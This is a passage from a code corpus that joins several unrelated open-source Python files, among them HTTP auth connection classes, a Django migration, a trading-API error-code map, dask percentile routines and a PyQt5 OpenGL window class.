def __init__(self, username, password, host, debug=0):
logger.debug('Creating new connection with username=%s host=%s', username, host)
base64string = base64.encodestring(('%s:%s' % (username, password)).encode('utf-8')).replace(b'\n', b'')
super(BasicAuthConnection, self).__init__(host, b'Basic ' + base64string, debug)
class BearerAuthConnection(BaseConnection):
def __init__(self, token, host, debug=0):
logger.debug('Creating new connection with token=%s host=%s', token[:5], host)
super(BearerAuthConnection, self).__init__(host, 'Bearer %s' % token.strip(), debug)
class LoggingHandler(BaseHandler):
def __init__(self):
pass
# noinspection PyMethodMayBeStatic
def http_request(self, request):
path = urlparse(request.get_full_url()).path
logger.debug('Sending request: method=%s uri=%s', request.get_method(), path)
return request
# noinspection PyMethodMayBeStatic,PyUnusedLocal
def http_response(self, request, response):
logger.debug('Response received: status=%s msg=%s', response.getcode(), response.msg)
return response
https_request = http_request
https_response = http_response
class KerberosConnection(object):
def __init__(self, host):
logger.debug('Creating new kerberos connection with host=%s', host)
self._host = host
def make_request(self, uri, body=None):
response = requests.post('{0}{1}'.format(self._host, uri), json=body, auth=HTTPKerberosAuth(), verify=False)
return response.json()
|
walle/model/role.py | hujiangyihao/test | 12,282 | 12739895 | # -*- coding: utf-8 -*-
"""
walle-web
:copyright: © 2015-2019 walle-web.io
:created time: 2018-11-26 16:06:44
:author: <EMAIL>
"""
from datetime import datetime
from sqlalchemy import String, Integer, DateTime
from walle.model.database import SurrogatePK
from walle.model.database import db, Model
from walle.model.user import UserModel
from walle.service.extensions import permission
from walle.service.rbac.role import *
class RoleModel(object):
_role_super = 'SUPER'
_role_owner = 'OWNER'
_role_master = 'MASTER'
_role_developer = 'DEVELOPER'
_role_reporter = 'REPORTER'
@classmethod
def list(cls):
roles = [
{'id': cls._role_super, 'name': '超级管理员'},
{'id': cls._role_owner, 'name': '空间所有者'},
{'id': cls._role_master, 'name': '项目管理员'},
{'id': cls._role_developer, 'name': '开发者'},
{'id': cls._role_reporter, 'name': '访客'},
]
return roles, len(roles)
@classmethod
def item(cls, role_id):
return None
@classmethod
def menu_url(cls, url):
if url == '/':
return url
prefix = 'admin' if current_user.role == SUPER else session['space_info']['name']
return '/' + prefix + url
|
Youtube Trending Feed Scrapper/scrap_reader.py | avinashkranjan/PraticalPythonProjects | 930 | 12739905 | # Youtube Trending Feed Reader
# Written by XZANATOL
from optparse import OptionParser
from pymongo import MongoClient
import pandas as pd
import sys
# Help menu
usage = """
<Script> [Options]
[Options]
-h, --help Shows this help message and exit
-c, --csv Reads data from "Youtube.csv" file
-m, --mongo Reads data from MongoDB
"""
# Load args
parser = OptionParser()
parser.add_option("-c", "--csv", action="store_true", dest="csv",
help="Saves extracted contents to a CSV file.")
parser.add_option("-m", "--mongo", action="store_true",
dest="mongo", help="Saves extracted contents to a MongoDB.")
def read_mongo():
# Connect to service
client = MongoClient("127.0.0.1")
# Create an object
db = client.Youtube.trending
return db.find() # Return all values
def read_csv():
# read databse
df = pd.read_csv("Youtube.csv")
data = []
for index, row in df.iterrows():
data.append(row) # Append each dictionary to the list
return data # Return all values
def display(data):
i = 0
for card in data:
# For every 10 cards print section
if i % 10 == 0:
c = input("Show Section? [y/n] > ")
if c.lower() == "y":
print("***********************************")
print(f"""{card["section"]} section""")
print("***********************************")
else:
sys.exit() # If had enough of reading
i += 1 # Increament
print("Title:", card["title"])
print("Link:", card["link"])
print("Channel:", card["channel"])
print("Views:", card["views"])
print("Time:", card["date"])
print("==============================================")
if __name__ == "__main__":
(options, args) = parser.parse_args()
# Flags
csv = options.csv
mongo = options.mongo
# Validate flags
if not (bool(csv) ^ bool(mongo)): # XNOR Gate
print(usage)
sys.exit()
if mongo:
data = read_mongo()
else:
data = read_csv()
display(data)
|
jarbas/chamber_of_deputies/migrations/0004_alter_field_names_following_toolbox_renamings.py | vbarceloscs/serenata-de-amor | 3,001 | 12739920 | <filename>jarbas/chamber_of_deputies/migrations/0004_alter_field_names_following_toolbox_renamings.py
from django.contrib.postgres.fields import ArrayField
from django.db import migrations, models
def convert_reimbursement_numbers_to_array(apps, schema_editor):
Reimbursement = apps.get_model("chamber_of_deputies", "Reimbursement")
for record in Reimbursement.objects.all():
record.numbers = record.reimbursement_numbers.split(", ")
record.save()
def convert_reimbursement_numbers_to_array_rollback(apps, schema_editor):
Reimbursement = apps.get_model("chamber_of_deputies", "Reimbursement")
for record in Reimbursement.objects.all():
record.reimbursement_numbers = ", ".join(record.numbers)
record.save()
class Migration(migrations.Migration):
dependencies = [
("chamber_of_deputies", "0003_remove_available_in_latest_dataset_field")
]
operations = [
migrations.AlterField(
model_name="reimbursement",
name="document_id",
field=models.IntegerField(db_index=True),
),
migrations.AlterField(
model_name="reimbursement",
name="supplier",
field=models.CharField(max_length=256),
),
migrations.AlterField(
model_name="reimbursement",
name="issue_date",
field=models.DateField(null=True),
),
migrations.RenameField(
model_name="reimbursement",
old_name="total_reimbursement_value",
new_name="total_value",
),
migrations.RenameField(
model_name="reimbursement",
old_name="subquota_id",
new_name="subquota_number",
),
migrations.AddField(
model_name="reimbursement",
name="numbers",
field=ArrayField(models.CharField(max_length=128), default=list),
),
migrations.RunPython(
convert_reimbursement_numbers_to_array,
convert_reimbursement_numbers_to_array_rollback,
),
migrations.RemoveField(model_name="reimbursement", name="net_values"),
migrations.RemoveField(
model_name="reimbursement", name="reimbursement_numbers"
),
migrations.RemoveField(model_name="reimbursement", name="reimbursement_values"),
]
|
llvm/utils/Target/ARM/analyze-match-table.py | medismailben/llvm-project | 4,812 | 12739933 | #!/usr/bin/env python
from __future__ import print_function
def analyze_match_table(path):
# Extract the instruction table.
data = open(path).read()
start = data.index("static const MatchEntry MatchTable")
end = data.index("\n};\n", start)
lines = data[start:end].split("\n")[1:]
# Parse the instructions.
insns = []
for ln in lines:
ln = ln.split("{", 1)[1]
ln = ln.rsplit("}", 1)[0]
a,bc = ln.split("{", 1)
b,c = bc.split("}", 1)
code, string, converter, _ = [s.strip()
for s in a.split(",")]
items = [s.strip() for s in b.split(",")]
_,features = [s.strip() for s in c.split(",")]
assert string[0] == string[-1] == '"'
string = string[1:-1]
insns.append((code,string,converter,items,features))
# For every mnemonic, compute whether or not it can have a carry setting
# operand and whether or not it can have a predication code.
mnemonic_flags = {}
for insn in insns:
mnemonic = insn[1]
items = insn[3]
flags = mnemonic_flags[mnemonic] = mnemonic_flags.get(mnemonic, set())
flags.update(items)
mnemonics = set(mnemonic_flags)
ccout_mnemonics = set(m for m in mnemonics
if 'MCK_CCOut' in mnemonic_flags[m])
condcode_mnemonics = set(m for m in mnemonics
if 'MCK_CondCode' in mnemonic_flags[m])
noncondcode_mnemonics = mnemonics - condcode_mnemonics
print(' || '.join('Mnemonic == "%s"' % m
for m in ccout_mnemonics))
print(' || '.join('Mnemonic == "%s"' % m
for m in noncondcode_mnemonics))
def main():
import sys
if len(sys.argv) == 1:
import os
from lit.Util import capture
llvm_obj_root = capture(["llvm-config", "--obj-root"])
file = os.path.join(llvm_obj_root,
"lib/Target/ARM/ARMGenAsmMatcher.inc")
elif len(sys.argv) == 2:
file = sys.argv[1]
else:
raise NotImplementedError
analyze_match_table(file)
if __name__ == '__main__':
main()
|
vnpy/api/tap/error_codes.py | iamyyl/vnpy | 323 | 12739948 | error_map = {
0: None,
-1: "连接服务失败",
-2: "链路认证失败",
-3: "主机地址不可用",
-4: "发送数据错误",
-5: "测试编号不合法",
-6: "没准备好测试网络",
-7: "当前网络测试还没结束",
-8: "没用可用的接入前置",
-9: "数据路径不可用",
-10: "重复登录",
-11: "内部错误",
-12: "上一次请求还没有结束",
-13: "输入参数非法",
-14: "授权码不合法",
-15: "授权码超期",
-16: "授权码类型不匹配",
-17: "API还没有准备好",
-18: "UDP端口监听失败",
-19: "UDP正在监听",
-20: "接口未实现",
-21: "每次登陆只允许调用一次",
-22: "超过下单频率。",
-10000: "输入数据为NULL",
-10001: "输入错误的:TAPIYNFLAG",
-10002: "输入错误的:TAPILOGLEVEL",
-10003: "输入错误的:TAPICommodityType",
-10004: "输入错误的:TAPICallOrPutFlagType",
-12001: "输入错误的:TAPIAccountType",
-12003: "输入错误的:TAPIAccountState",
-12004: "输入错误的:TAPIAccountFamilyType",
-12005: "输入错误的:TAPIOrderTypeType",
-12006: "输入错误的:TAPIOrderSourceType",
-12007: "输入错误的:TAPITimeInForceType",
-12008: "输入错误的:TAPISideType",
-12009: "输入错误的:TAPIPositionEffectType",
-12010: "输入错误的:TAPIHedgeFlagType",
-12011: "输入错误的:TAPIOrderStateType",
-12012: "输入错误的:TAPICalculateModeType",
-12013: "输入错误的:TAPIMatchSourceType",
-12014: "输入错误的:TAPIOpenCloseModeType",
-12015: "输入错误的:TAPIFutureAlgType",
-12016: "输入错误的:TAPIOptionAlgType",
-12017: "输入错误的:TAPIBankAccountLWFlagType",
-12021: "输入错误的:TAPIMarginCalculateModeType",
-12022: "输入错误的:TAPIOptionMarginCalculateModeType",
-12023: "输入错误的:TAPICmbDirectType",
-12024: "输入错误的:TAPIDeliveryModeType",
-12025: "输入错误的:TAPIContractTypeType",
-12035: "输入错误的:TAPITacticsTypeType",
-12036: "输入错误的:TAPIORDERACT",
-12041: "输入错误的:TAPITriggerConditionType",
-12042: "输入错误的:TAPITriggerPriceTypeType",
-12043: "输入错误的:TAPITradingStateType",
-12044: "输入错误的:TAPIMarketLevelType",
-12045: "输入错误的:TAPIOrderQryTypeType",
1: "主动断开",
2: "被动断开",
3: "读错误",
4: "写错误",
5: "缓冲区满",
6: "异步操作错误",
7: "解析数据错误",
8: "连接超时",
9: "初始化失败",
10: "已经连接",
11: "工作线程已结束",
12: "操作正在进行,请稍后重试",
13: "心跳检测失败",
10001: "登录过程执行错误",
10002: "登录用户不存在",
10003: "需要进行动态认证",
10004: "登录用户未授权",
10005: "登录模块不正确",
10006: "需要强制修改密码",
10007: "登录状态禁止登陆",
10008: "登录密码不正确",
10009: "没有该模块登录权限",
10010: "登录数量超限",
10011: "登录用户不在服务器标识下可登录用户列表中",
10012: "登录用户已被冻结",
10013: "密码错误,用户冻结",
10014: "客户状态不允许登录",
10015: "需要进行二次认证",
10016: None,
10017: None,
10018: "登录用户密码超过有效天数",
10101: "登录用户信息查询失败",
11001: "数据库操作失败",
11501: "登录用户下属所有资金账号查询失败",
11701: "登录用户密码修改失败",
11702: "登录用户密码修改失败——原始密码错误",
11703: "登录用户密码修改失败——不能与前n次密码相同",
11704: "新密码不符合密码复杂度要求",
20201: "资金账号信息查询失败",
20701: "客户交易编码查询失败",
22801: "合约信息查询失败",
22901: "特殊期权标的查询失败",
25501: "品种委托类型查询失败",
25601: "品种委托时间有效性查询失败",
28901: "用户下单频率查询失败",
60001: "资金账号不存在",
60002: "资金账号状态不正确",
60003: "资金账号交易中心不一致",
60004: "资金账号无期权交易权限",
60005: "资金账号无品种交易权限",
60006: "资金账号无开仓权限",
60007: "资金账号风控项检查失败",
60011: "下单无效的合约",
60021: "客户权限禁止交易",
60022: "客户品种分组禁止交易",
60023: "客户合约特设禁止交易",
60024: "系统权限禁止交易",
60031: "持仓量超过最大限制",
60032: "下单超过单笔最大量",
60033: "下单合约无交易路由",
60034: "委托价格超出偏离范围",
60035: "超过GiveUp最大持仓量",
60036: "下单自动审核失败",
60037: "LME未准备就绪",
60038: "平仓方式错误",
60039: "下单对应的父账号资金不足",
60040: "互换单的合约格式错误",
60051: "下单资金不足",
60052: "手续费参数错误",
60053: "保证金参数错误",
60061: "撤单无此系统号",
60062: "此状态不允许撤单",
60063: "录单不允许撤单",
60071: "此状态不允许改单",
60072: "人工单不允许改单",
60081: "已删除报单不能转移",
60082: "人工单不允许改单",
60091: "录单重复",
60092: "保证金参数错误",
60100: "操作账号只可查询",
60101: "合约行情价格修改失败",
60102: "即使子帐号又是做市商不能应价",
60103: "下单找不到交易编码",
60104: "操作账号只可开仓",
60105: "操作账号没有上期挂单查询权限",
60106: "限期有效单不能小于当前交易日",
60107: "该编码不允许申请或拆分组合",
60108: "非本服务器标记下的账号不允许操作",
60109: "行权或弃权量超过可用量",
60110: "没有订单审核权限",
60111: "下单超过上手单笔最大量",
60115: "非大连应价单不允许两笔委托量不一致",
60117: "申请不允许重复提交",
60118: "超过账号下单频率限制",
60119: "组合表不存在的组合方向或投保标志",
61001: "订单操作频率过高",
61002: "委托查询返回前不能进行下次查询",
72001: "超过行情最大总订阅数",
72002: "超过该交易所行情最大订阅数",
72101: "没有该行情的订阅权限",
72102: "没有该交易所下行情的订阅权限",
72103: "品种不存在",
72104: "合约可能不存在",
83001: "不支持的行情协议",
14001: "二次验证失败",
14002: "二次验证超时",
11000: "数据库连接失败",
11002: "不允许一对多",
11003: "删除失败-存在关联信息,",
11004: "删除分组失败-分组有下属或在操作员下属中",
12001: "登录用户密码修改失败-原始密码错误",
12002: "登录用户密码修改失败-不能与前n次密码相同",
12003: "登录用户密码修改失败-新密码不符合密码复杂度要求",
13001: "一个币种组只能设置一个基币",
13002: "基币只能是美元或港币",
60012: "LME未准备就绪",
60013: "不支持的下单类型",
60014: "错误的埋单类型",
60015: "不合法的委托类型",
60025: "客户权限只可平仓",
60026: "客户合约特设只可平仓",
60027: "系统权限只可平仓",
60028: "只可平仓提前天数限制只可平仓",
60029: "客户品种风控权限禁止交易",
60030: "客户品种风控权限只可平仓",
60041: "未登录网关",
60042: "未找到网关信息",
60054: "总基币资金不足",
60055: "超过保证金额度",
60056: "总基币超过开仓比例限制",
60057: "独立币种组超过开仓比例限制",
60058: "风险阵列参数错误",
60073: "风险报单不允许改单",
60074: "成交量大于改单量",
60075: "预埋单不允许改单",
60112: "下单超过上手最大持仓量",
60121: "开平方式错误",
60122: "委托平仓持仓不足",
60123: "成交平仓失败",
60131: "未找到本地委托",
60132: "与网关断开连接",
60141: "录单成交重复",
60142: "录单成交未找到对应委托",
60143: "录单成交合约不存在",
60144: "录单成交参数错误",
60145: "录单成交委托状态错误",
60151: "成交删除未找到成交",
60152: "此状态成交不可删",
60161: "不允许录入此状态订单",
60162: "错误的修改订单请求",
60163: "订单不可删,存在对应成交",
60164: "不合法的委托状态",
60165: "此状态不允许订单转移",
60166: "订单不允许删除",
60171: "做市商双边撤单未找到委托",
60172: "做市商双边撤单客户不一致",
60173: "做市商双边撤单品种不一致",
60174: "做市商双边撤单合约不一致",
60175: "做市商双边撤单买卖方向相同",
60176: "做市商双边撤单买卖方向错误",
60177: "做市商单边检查未通过",
60181: "埋单激活失败,订单未找到",
60182: "埋单激活失败,非有效状态",
80001: "网关未就绪,未连接上手",
80002: "品种错误",
80003: "合约错误",
80004: "报单字段有误",
80005: "价格不合法",
80006: "数量不合法",
80007: "报单类型不合法",
80008: "委托模式不合法",
80009: "委托不存在(改单、撤单)",
80010: "发送报单失败",
80011: "被上手拒绝",
90001: "前置不允许该模块登录",
90002: "一次请求太多数据",
90003: "前置没有所要数据",
90004: "所查询的操作员信息不存在",
90011: "前置与交易断开",
90012: "前置与管理断开",
90021: "下属资金账号不存在",
90022: "该操作员不允许交易",
90023: "查询频率过快",
90024: "该授权不予许登录",
90025: "自成交验证不通过",
-23: "查询频率太快。",
-24: "不符合调用条件。",
-25: "改单撤单时没有找到对应订单。",
-26: "日志路径为空。",
-27: "打开日志文件失败",
-28: "没有交易员登录权限",
-29: "没有订单录入或者成交录入",
-30: "没有订单修改和订单删除权限,成交删除权限",
-31: "没有订单转移权限",
-32: "成交录入时系统号为空",
-33: "成交删除时成交号为空。",
-34: "成交删除时没有找到对应的成交",
-35: "订单修改时客户账号变动。",
-36: "订单转移时客户账号没有变动",
-37: "修改的电话密码位数不对或者包含特殊字符。",
-38: "未绑定的二次认证信息",
-39: "二次认证有效期内不能再申请二次认证码",
-40: "没有设置客户密码的权限。",
-41: "风险保单单客户无法撤销或更改",
-42: "改单是客户账号填写与订单客户账号不一致",
-11001: "输入错误的:TAPIBucketDateFlag",
-11002: "输入错误的:TAPIHisQuoteType",
-12002: "输入错误的:TAPIUserTypeType",
-12018: "输入错误的:TAPIBankAccountStateType",
-12019: "输入错误的:TAPIBankAccountSwapStateType",
-12020: "输入错误的:TAPIBankAccountTransferStateType",
-12026: "输入错误的:TAPIPartyTypeType",
-12027: "输入错误的:TAPIPartyCertificateTypeType",
-12028: "输入错误的:TAPIMsgReceiverType",
-12029: "输入错误的:TAPIMsgTypeType",
-12030: "输入错误的:TAPIMsgLevelType",
-12031: "输入错误的:TAPITransferDirectType",
-12032: "输入错误的:TAPITransferStateType",
-12033: "输入错误的:TAPITransferTypeType",
-12034: "输入错误的:TAPITransferDeviceIDType",
-12037: "输入错误的:TAPIBillTypeType",
-12038: "输入错误的:TAPIBillFileTypeType",
-12039: "输入错误的:TAPIOFFFlagType",
-12040: "输入错误的:TAPICashAdjustTypeType",
-12046: "输入错误的: ClientID,ClientID包含特殊字符。",
-13001: "历史行情查询参数不合法",
-13002: "价格和数量中包含NAN或者INF不合法的数值",
-12047: "输入错误的到期日",
-12048: "错误的密码类型",
-12049: "错误的结算数据类型",
}
|
hippy/module/hash/cwhirlpool.py | jweinraub/hippyvm | 289 | 12739962 | <reponame>jweinraub/hippyvm<gh_stars>100-1000
from rpython.translator.tool.cbuild import ExternalCompilationInfo
from rpython.rtyper.tool import rffi_platform as platform
from rpython.rtyper.lltypesystem import rffi, lltype
from hippy.tool.platform import get_gmake
import subprocess
import py
LIBDIR = py.path.local(__file__).join('..', 'lib', 'whirlpool/')
subprocess.check_call([get_gmake(), '-C', str(LIBDIR)])
eci = ExternalCompilationInfo(
includes=['whirlpool.h'],
library_dirs=[str(LIBDIR)],
libraries=['whirlpool1'],
testonly_libraries=['whirlpool'],
include_dirs=[str(LIBDIR)])
class CConfig:
_compilation_info_ = eci
WHIRLPOOL_CTX = platform.Struct('WHIRLPOOL_CTX', [])
globals().update(platform.configure(CConfig))
def external(name, args, result):
return rffi.llexternal(name, args, result,
compilation_info=eci, releasegil=False)
PTR_WHIRLPOOL_CTX = lltype.Ptr(WHIRLPOOL_CTX)
c_WHIRLPOOLInit = external('WHIRLPOOLInit',
[PTR_WHIRLPOOL_CTX], lltype.Void)
c_WHIRLPOOLUpdate = external('WHIRLPOOLUpdate',
[PTR_WHIRLPOOL_CTX,
rffi.CCHARP,
rffi.UINT],
lltype.Void)
c_WHIRLPOOLFinal = external('WHIRLPOOLFinal',
[rffi.CCHARP,
PTR_WHIRLPOOL_CTX],
lltype.Void)
|
dask/array/percentile.py | marcelned/dask | 9,684 | 12740002 | <filename>dask/array/percentile.py
from collections.abc import Iterator
from functools import wraps
from numbers import Number
import numpy as np
from tlz import merge
from ..base import tokenize
from ..highlevelgraph import HighLevelGraph
from .core import Array
@wraps(np.percentile)
def _percentile(a, q, interpolation="linear"):
n = len(a)
if not len(a):
return None, n
if isinstance(q, Iterator):
q = list(q)
if a.dtype.name == "category":
result = np.percentile(a.cat.codes, q, interpolation=interpolation)
import pandas as pd
return pd.Categorical.from_codes(result, a.dtype.categories, a.dtype.ordered), n
if type(a.dtype).__name__ == "DatetimeTZDtype":
import pandas as pd
if isinstance(a, (pd.Series, pd.Index)):
a = a.values
if np.issubdtype(a.dtype, np.datetime64):
values = a
a2 = values.view("i8")
result = np.percentile(a2, q, interpolation=interpolation).astype(values.dtype)
if q[0] == 0:
# https://github.com/dask/dask/issues/6864
result[0] = min(result[0], values.min())
return result, n
if not np.issubdtype(a.dtype, np.number):
interpolation = "nearest"
return np.percentile(a, q, interpolation=interpolation), n
def _tdigest_chunk(a):
from crick import TDigest
t = TDigest()
t.update(a)
return t
def _percentiles_from_tdigest(qs, digests):
from crick import TDigest
t = TDigest()
t.merge(*digests)
return np.array(t.quantile(qs / 100.0))
def percentile(a, q, interpolation="linear", method="default"):
"""Approximate percentile of 1-D array
Parameters
----------
a : Array
q : array_like of float
Percentile or sequence of percentiles to compute, which must be between
0 and 100 inclusive.
interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}, optional
The interpolation method to use when the desired percentile lies
between two data points ``i < j``. Only valid for ``method='dask'``.
- 'linear': ``i + (j - i) * fraction``, where ``fraction``
is the fractional part of the index surrounded by ``i``
and ``j``.
- 'lower': ``i``.
- 'higher': ``j``.
- 'nearest': ``i`` or ``j``, whichever is nearest.
- 'midpoint': ``(i + j) / 2``.
method : {'default', 'dask', 'tdigest'}, optional
What method to use. By default will use dask's internal custom
algorithm (``'dask'``). If set to ``'tdigest'`` will use tdigest for
floats and ints and fallback to the ``'dask'`` otherwise.
See Also
--------
numpy.percentile : Numpy's equivalent Percentile function
"""
from .dispatch import percentile_lookup as _percentile
from .utils import array_safe, meta_from_array
if not a.ndim == 1:
raise NotImplementedError("Percentiles only implemented for 1-d arrays")
if isinstance(q, Number):
q = [q]
q = array_safe(q, like=meta_from_array(a))
token = tokenize(a, q, interpolation)
dtype = a.dtype
if np.issubdtype(dtype, np.integer):
dtype = (array_safe([], dtype=dtype, like=meta_from_array(a)) / 0.5).dtype
meta = meta_from_array(a, dtype=dtype)
allowed_methods = ["default", "dask", "tdigest"]
if method not in allowed_methods:
raise ValueError("method can only be 'default', 'dask' or 'tdigest'")
if method == "default":
internal_method = "dask"
else:
internal_method = method
# Allow using t-digest if interpolation is allowed and dtype is of floating or integer type
if (
internal_method == "tdigest"
and interpolation == "linear"
and (np.issubdtype(dtype, np.floating) or np.issubdtype(dtype, np.integer))
):
from dask.utils import import_required
import_required(
"crick", "crick is a required dependency for using the t-digest method."
)
name = "percentile_tdigest_chunk-" + token
dsk = {
(name, i): (_tdigest_chunk, key) for i, key in enumerate(a.__dask_keys__())
}
name2 = "percentile_tdigest-" + token
dsk2 = {(name2, 0): (_percentiles_from_tdigest, q, sorted(dsk))}
# Otherwise use the custom percentile algorithm
else:
# Add 0 and 100 during calculation for more robust behavior (hopefully)
calc_q = np.pad(q, 1, mode="constant")
calc_q[-1] = 100
name = "percentile_chunk-" + token
dsk = {
(name, i): (_percentile, key, calc_q, interpolation)
for i, key in enumerate(a.__dask_keys__())
}
name2 = "percentile-" + token
dsk2 = {
(name2, 0): (
merge_percentiles,
q,
[calc_q] * len(a.chunks[0]),
sorted(dsk),
interpolation,
)
}
dsk = merge(dsk, dsk2)
graph = HighLevelGraph.from_collections(name2, dsk, dependencies=[a])
return Array(graph, name2, chunks=((len(q),),), meta=meta)
def merge_percentiles(
finalq, qs, vals, interpolation="lower", Ns=None, raise_on_nan=True
):
"""Combine several percentile calculations of different data.
Parameters
----------
finalq : numpy.array
Percentiles to compute (must use same scale as ``qs``).
qs : sequence of :class:`numpy.array`s
Percentiles calculated on different sets of data.
vals : sequence of :class:`numpy.array`s
Resulting values associated with percentiles ``qs``.
Ns : sequence of integers
The number of data elements associated with each data set.
interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}
Specify the type of interpolation to use to calculate final
percentiles. For more information, see :func:`numpy.percentile`.
Examples
--------
>>> finalq = [10, 20, 30, 40, 50, 60, 70, 80]
>>> qs = [[20, 40, 60, 80], [20, 40, 60, 80]]
>>> vals = [np.array([1, 2, 3, 4]), np.array([10, 11, 12, 13])]
>>> Ns = [100, 100] # Both original arrays had 100 elements
>>> merge_percentiles(finalq, qs, vals, Ns=Ns)
array([ 1, 2, 3, 4, 10, 11, 12, 13])
"""
from .utils import array_safe
if isinstance(finalq, Iterator):
finalq = list(finalq)
finalq = array_safe(finalq, like=finalq)
qs = list(map(list, qs))
vals = list(vals)
if Ns is None:
vals, Ns = zip(*vals)
Ns = list(Ns)
L = list(zip(*[(q, val, N) for q, val, N in zip(qs, vals, Ns) if N]))
if not L:
if raise_on_nan:
raise ValueError("No non-trivial arrays found")
return np.full(len(qs[0]) - 2, np.nan)
qs, vals, Ns = L
# TODO: Perform this check above in percentile once dtype checking is easy
# Here we silently change meaning
if vals[0].dtype.name == "category":
result = merge_percentiles(
finalq, qs, [v.codes for v in vals], interpolation, Ns, raise_on_nan
)
import pandas as pd
return pd.Categorical.from_codes(result, vals[0].categories, vals[0].ordered)
if not np.issubdtype(vals[0].dtype, np.number):
interpolation = "nearest"
if len(vals) != len(qs) or len(Ns) != len(qs):
raise ValueError("qs, vals, and Ns parameters must be the same length")
# transform qs and Ns into number of observations between percentiles
counts = []
for q, N in zip(qs, Ns):
count = np.empty_like(finalq, shape=len(q))
count[1:] = np.diff(array_safe(q, like=q[0]))
count[0] = q[0]
count *= N
counts.append(count)
# Sort by calculated percentile values, then number of observations.
combined_vals = np.concatenate(vals)
combined_counts = array_safe(np.concatenate(counts), like=combined_vals)
sort_order = np.argsort(combined_vals)
combined_vals = np.take(combined_vals, sort_order)
combined_counts = np.take(combined_counts, sort_order)
# percentile-like, but scaled by total number of observations
combined_q = np.cumsum(combined_counts)
# rescale finalq percentiles to match combined_q
finalq = array_safe(finalq, like=combined_vals)
desired_q = finalq * sum(Ns)
# the behavior of different interpolation methods should be
# investigated further.
if interpolation == "linear":
rv = np.interp(desired_q, combined_q, combined_vals)
else:
left = np.searchsorted(combined_q, desired_q, side="left")
right = np.searchsorted(combined_q, desired_q, side="right") - 1
np.minimum(left, len(combined_vals) - 1, left) # don't exceed max index
lower = np.minimum(left, right)
upper = np.maximum(left, right)
if interpolation == "lower":
rv = combined_vals[lower]
elif interpolation == "higher":
rv = combined_vals[upper]
elif interpolation == "midpoint":
rv = 0.5 * (combined_vals[lower] + combined_vals[upper])
elif interpolation == "nearest":
lower_residual = np.abs(combined_q[lower] - desired_q)
upper_residual = np.abs(combined_q[upper] - desired_q)
mask = lower_residual > upper_residual
index = lower # alias; we no longer need lower
index[mask] = upper[mask]
rv = combined_vals[index]
else:
raise ValueError(
"interpolation can only be 'linear', 'lower', "
"'higher', 'midpoint', or 'nearest'"
)
return rv
|
moderngl_window/context/pyqt5/window.py | DavideRuzza/moderngl-window | 142 | 12740031 | from typing import Tuple
from PyQt5 import QtCore, QtOpenGL, QtWidgets, QtGui
from moderngl_window.context.base import BaseWindow
from moderngl_window.context.pyqt5.keys import Keys
class Window(BaseWindow):
"""
A basic window implementation using PyQt5 with the goal of
creating an OpenGL context and handle keyboard and mouse input.
This window bypasses Qt's own event loop to make things as flexible as possible.
If you need to use the event loop and are using other features
in Qt as well, this example can still be useful as a reference
when creating your own window.
"""
#: Name of the window
name = "pyqt5"
#: PyQt5 specific key constants
keys = Keys
# PyQt supports mode buttons, but we are limited by other libraries
_mouse_button_map = {
1: 1,
2: 2,
4: 3,
}
def __init__(self, **kwargs):
super().__init__(**kwargs)
# Specify OpenGL context parameters
gl = QtOpenGL.QGLFormat()
gl.setVersion(self.gl_version[0], self.gl_version[1])
gl.setProfile(QtOpenGL.QGLFormat.CoreProfile)
gl.setDepthBufferSize(24)
gl.setDoubleBuffer(True)
gl.setSwapInterval(1 if self.vsync else 0)
# Configure multisampling if needed
if self.samples > 1:
gl.setSampleBuffers(True)
gl.setSamples(int(self.samples))
# We need an application object, but we are bypassing the library's
# internal event loop to avoid unnecessary work
self._app = QtWidgets.QApplication([])
# Create the OpenGL widget
self._widget = QtOpenGL.QGLWidget(gl)
self.title = self._title
# If fullscreen we change the window to match the desktop on the primary screen
if self.fullscreen:
rect = QtWidgets.QDesktopWidget().screenGeometry()
self._width = rect.width()
self._height = rect.height()
self._buffer_width = rect.width() * self._widget.devicePixelRatio()
self._buffer_height = rect.height() * self._widget.devicePixelRatio()
if self.resizable:
# Ensure a valid resize policy when window is resizable
size_policy = QtWidgets.QSizePolicy(
QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding,
)
self._widget.setSizePolicy(size_policy)
self._widget.resize(self.width, self.height)
else:
self._widget.setFixedSize(self.width, self.height)
# Center the window on the screen if in window mode
if not self.fullscreen:
center_window_position = (
self.position[0] - self.width / 2,
self.position[1] - self.height / 2,
)
self._widget.move(*center_window_position)
# Needs to be set before show()
self._widget.resizeGL = self.resize
self.cursor = self._cursor
if self.fullscreen:
self._widget.showFullScreen()
else:
self._widget.show()
# We want mouse position events
self._widget.setMouseTracking(True)
# Override event functions in qt
self._widget.keyPressEvent = self.key_pressed_event
self._widget.keyReleaseEvent = self.key_release_event
self._widget.mouseMoveEvent = self.mouse_move_event
self._widget.mousePressEvent = self.mouse_press_event
self._widget.mouseReleaseEvent = self.mouse_release_event
self._widget.wheelEvent = self.mouse_wheel_event
self._widget.closeEvent = self.close_event
self._widget.showEvent = self.show_event
self._widget.hideEvent = self.hide_event
# Attach to the context
self.init_mgl_context()
# Ensure retina and 4k displays get the right viewport
self._buffer_width = self._width * self._widget.devicePixelRatio()
self._buffer_height = self._height * self._widget.devicePixelRatio()
self.set_default_viewport()
def _set_fullscreen(self, value: bool) -> None:
if value:
self._widget.showFullScreen()
else:
self._widget.showNormal()
@property
def size(self) -> Tuple[int, int]:
"""Tuple[int, int]: current window size.
This property also support assignment::
# Resize the window to 1000 x 1000
window.size = 1000, 1000
"""
return self._width, self._height
@size.setter
def size(self, value: Tuple[int, int]):
pos = self.position
self._widget.setGeometry(pos[0], pos[1], value[0], value[1])
@property
def position(self) -> Tuple[int, int]:
"""Tuple[int, int]: The current window position.
This property can also be set to move the window::
# Move window to 100, 100
window.position = 100, 100
"""
geo = self._widget.geometry()
return geo.x(), geo.y()
@position.setter
def position(self, value: Tuple[int, int]):
self._widget.setGeometry(value[0], value[1], self._width, self._height)
def swap_buffers(self) -> None:
"""Swap buffers, set viewport, trigger events and increment frame counter"""
self._widget.swapBuffers()
self.set_default_viewport()
self._app.processEvents()
self._frames += 1
@property
def cursor(self) -> bool:
"""bool: Should the mouse cursor be visible inside the window?
This property can also be assigned to::
# Disable cursor
window.cursor = False
"""
return self._cursor
@cursor.setter
def cursor(self, value: bool):
if value is True:
self._widget.setCursor(QtCore.Qt.ArrowCursor)
else:
self._widget.setCursor(QtCore.Qt.BlankCursor)
self._cursor = value
@property
def title(self) -> str:
